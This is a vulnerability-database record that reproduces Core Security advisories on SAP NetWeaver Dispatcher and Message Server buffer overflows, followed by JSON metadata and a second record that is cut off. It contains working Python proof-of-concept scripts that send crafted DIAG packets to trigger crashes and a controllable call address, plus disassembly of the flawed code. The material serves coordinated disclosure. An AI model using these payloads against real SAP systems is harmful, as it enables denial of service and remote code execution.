Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nPROVIDED AND/OR DISCOVERED BY:\nMartin Gallo, Core Security Technologies. \n\nORIGINAL ADVISORY:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. *Advisory Information*\n\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-08\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\nCVE-2012-2513, CVE-2012-2514\n\n\n3. *Vulnerability Description*\n\nSAP Netweaver [1] is a technology platform for building and integrating\nSAP business applications. By sending different messages, the different\nvulnerabilities can be triggered. \n\n\n4. *Vulnerable packages*\n\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313). SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869). Older versions are probably affected too, but they were not checked. \n\n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information. \n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\nissues. Contact SAP for further information. \n\nMartin Gallo proposed the following actions to mitigate the impact of\nthe vulnerabilities:\n\n 1. Disable work processes\u0027 Developer Traces for the \u0027Dialog\nProcessing\u0027 component (for the vulnerabilities [CVE-2011-1516],\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]). \n 2. Restrict access to the Dispatcher service\u0027s TCP ports (3200/3299)\n(for all vulnerabilities). \n 3. Restrict access to the work process management transactions\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\n[CVE-2012-2512]). \n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Martin Gallo\nfrom\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services. \nThe publication of this advisory was coordinated by Fernando Miranda\nfrom http://www.coresecurity.com/content/corelabs-advisories . \n\n\n8. *Technical Description / Proof of Concept Code*\n\n*NOTE:* (The tracing of \u0027Dialog processing\u0027 has to be in level 2 or 3 in\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\nand [CVE-2012-2512]). \n\nThe following python script can be used to reproduce the vulnerabilities\ndescribed below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)\u003clength:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize(sock):\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n user_connect =\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n support_data+=\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n support_data+=\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dpheader =\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\nsupport_data))\n dpheader+=\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\n dpheader+= \"terminalXXXXXXX\"\n dpheader+=\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n eom = \"\\x0c\"\n send_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection) \n\n-----/\n In the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities. \n\n\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\n\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\n\u0027disp+work.exe\u0027 module process a specially crafted network packet. \nMalicious packets are processed by the vulnerable function\n\u0027DiagTraceR3Info\u0027 in the \u0027disp+work.exe\u0027 module when the Developer Trace\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\nthe \"Dialog\" work process handling the packet [2]. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"X\"*114 + \"\\xff\\xff\" # --\u003e Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n-----/\n\n\n\n8.2. This vulnerability could allow a\nremote unauthenticated attacker to conduct a denial of service attack\nagainst the vulnerable systems. The following python code can be used to\ntrigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.3. This vulnerability could allow a remote\nunauthenticated attacker to conduct a denial of service attack. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n-----/\n\n\n\n8.4. \n\n/-----\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.5. \n\n/-----\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n-----/\n\n\n\n8.6. This\nvulnerability could allow a remote unauthenticated attacker to conduct a\ndenial of service attack. \n\n/-----\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n-----/\n\n\n\n9. *Report Timeline*\n\n. 2012-01-24:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for February\n21st, 2012. 2012-01-24:\nCore sends an advisory draft with technical details. 2012-01-24:\nThe SAP team confirms the reception of the issue and asks to use the\nsecurity ID 582820-2012 for further communication. SAP also notifies its\nterms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:\nThe Core Advisories Team communicates that it has its own guidelines for\nthe advisories publication process, which may conflict with SAP\u0027s\nguidelines. In particular, Core does not guarantee that the publication\nof the advisory will be postponed until a fix or patch is made available\nby SAP. If information about this vulnerability is partially or\ncompletely leaked by a third party, the advisory would be released\nimmediately as forced release. Despite this, the Core team commits to\ncomply with SAP\u0027s guidelines as much as possible. 2012-02-21:\nFirst release date missed. 2012-02-22:\nCore asks for the status of the fix and notifies that the release date\nwas missed. 2012-02-23:\nSAP notifies that, because the development team has to downport the\nsolutions for a huge bunch of software releases, the earliest release\ndate for the patches would be May 8th 2012. 2012-02-23:\nCore re-schedules the advisory publication to May 8th. 2012-04-16:\nCore asks if the patching process is still on track to release patches\non May 8th and requests a status of the fix. 2012-04-16:\nVendor notifies that the release date is still planned for May 8th, but\ndue to quality control processes this date cannot be guaranteed. 2012-05-04:\nCore notifies that everything is ready for publication and requests the\nvendor to confirm the release date and the list of affected platforms\n(no reply received). 2012-05-07:\nCore asks again for the status of the fix. 2012-05-08:\nSAP notifies that they have released the security note 1687910 [4] on\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\nalso requests Core to remove all the technical information researched by\nMartin Gallo in [Sec. 8]. 2012-05-08:\nCore replies that the reporting of vulnerabilities is aimed at helping\nvulnerable users to understand and address the issues; the advisory will\nthus be released with the technical information. 2012-05-08:\nAdvisory CORE-2012-0123 published. \n\n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP\u0027s legal information, terms and conditions\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n\n[4] SAP security note 1687910\nhttps://service.sap.com/sap/support/notes/1687910. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
}
],
"trust": 2.16
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=20705",
"trust": 0.2,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2514"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2514",
"trust": 2.9
},
{
"db": "SECTRACK",
"id": "1027052",
"trust": 1.1
},
{
"db": "BID",
"id": "53424",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404",
"trust": 0.8
},
{
"db": "SECUNIA",
"id": "48980",
"trust": 0.7
},
{
"db": "NSFOCUS",
"id": "19579",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "20705",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-2514",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112569",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "112538",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
]
},
"id": "VAR-201205-0132",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.2949160133333333
},
"last_update_date": "2023-12-18T12:22:02.601000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"db": "NVD",
"id": "CVE-2012-2514"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1027052"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75456"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2514"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2514"
},
{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/53424"
},
{
"trust": 0.6,
"url": "http://secunia.com/advisories/48980"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/19579"
},
{
"trust": 0.4,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/20705/"
},
{
"trust": 0.1,
"url": "http://secunia.com/psi_30_beta_launch"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_intelligence/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/secunia_security_advisories/"
},
{
"trust": 0.1,
"url": "http://secunia.com/vulnerability_scanning/personal/"
},
{
"trust": 0.1,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.1,
"url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=48980"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/48980/#comments"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/about_secunia_advisories/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/services-overview-core-security-consulting-services."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2511"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1516"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1517"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2513"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/corelabs-advisories"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2514"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1687910."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2512"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46."
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"db": "PACKETSTORM",
"id": "112569"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-05-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"date": "2012-05-08T00:00:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"date": "2012-05-09T07:38:14",
"db": "PACKETSTORM",
"id": "112569"
},
{
"date": "2012-05-08T15:15:15",
"db": "PACKETSTORM",
"id": "112538"
},
{
"date": "2012-05-15T04:21:43.500000",
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"date": "2012-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-12-06T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2514"
},
{
"date": "2012-09-04T05:50:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002404"
},
{
"date": "2017-12-06T02:29:05.617000",
"db": "NVD",
"id": "CVE-2012-2514"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of DiagiEventSource Service disruption in functions ( Daemon crash ) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002404"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-162"
}
],
"trust": 0.6
}
}
var-202001-0832
Vulnerability from variot
A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04.
The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
CORE-2012-1128
- Advisory Information
Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release
- Vulnerability Information
Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593
-
By sending different messages, the different vulnerabilities can be triggered.
-
Vulnerable packages
. Older versions are probably affected too, but they were not checked.
- Non-vulnerable packages
. Vendor did not provide this information.
- Vendor Information, Solutions and Workarounds
SAP released the security note 1800603 [2] regarding these issues.
- Credits
Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
- Technical Description / Proof of Concept Code
The following python script is the main PoC that can be used to reproduce all vulnerabilities described below:
/----- import socket, struct from optparse import OptionParser
Parse the target options
parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args()
client_string = '-'+' '39 server_name = '-'+' '39
def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet)
def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data)
def initialize_connection(hostname, port):
# Connect
print "[*] Connecting to", hostname, "port", port
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((hostname, port))
# Send initialization packet
print "[*] Conected, sending login request"
init = '**MESSAGE**\x00' # eyecatcher
init+= '\x04' # version
init+= '\x00' # errorno
init+= client_string # toname
init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' #
msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init)
# Receive response
print "[*] Receiving login reply"
(length, data) = receive(connection)
# Parsing login reply
server_name = data[4+64:4+64+40]
return connection
Main PoC body
connection = initialize_connection(options.hostname, options.port) send_attack(connection)
-----/
In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.
8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module.
The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows:
/----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT':
/----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ...
-----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function:
/----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax8] lea esi, j2ee_stat_services.totalMsgCount[esi8] ;using the index without validating array bounds
-----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct:
